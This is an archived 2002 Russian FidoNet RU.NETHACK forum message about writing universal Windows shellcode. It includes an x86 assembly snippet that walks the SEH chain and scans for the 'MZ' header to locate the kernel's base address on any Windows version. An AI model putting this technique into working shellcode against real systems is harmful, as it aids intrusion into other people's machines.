|
|
ru.nethack- RU.NETHACK ------------------------------------------------------------------- From : Eugene Suchkov 2:5050/72.18 05 Nov 2002 13:14:30 To : Yaroslav Klyukin Subject : Универсальный шеллкод для Windows + Борьба со спамботами --------------------------------------------------------------------------------
Thursday October 31 2002 20:54, Yaroslav Klyukin wrote to Eugene Suchkov:
YK>>> А какие не загружаются?
ES>> Многие. Hапример, IIS 5.1 - загружается с 0x1000000.
YK> Hу и какие проблемы?
YK> Пишешь шеллкод для IIS 5.1, меняешь 4 на 1 и он работает на _всех_
YK> версиях виндов.
ДДД Тут начинается Windows Clipboard ДДД
mov eax, fs:[0]
sehsearch:
cmp dword ptr [eax], -1
jz sehfound
mov eax, dword ptr [eax]
jmp sehsearch
sehfound:
mov ecx, dword ptr [eax+4]
or ecx, 0FFFFh
inc ecx
kernel_loop:
sub ecx, 10000h
cmp word ptr [ecx], 'ZM'
jnz kernel_loop
ДДД А здесь Windows Clipboard кончается ДДД
Этот код находит кернел на всех виндах и из любой проги.
Eugene
Tuesday November 05 2002, 12:14
--- GoldED+/W32 1.1.5-20020105
* Origin: (2:5050/72.18)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор Архивное /ru.nethack/160793dc7807d.html, оценка из 5, голосов 10
|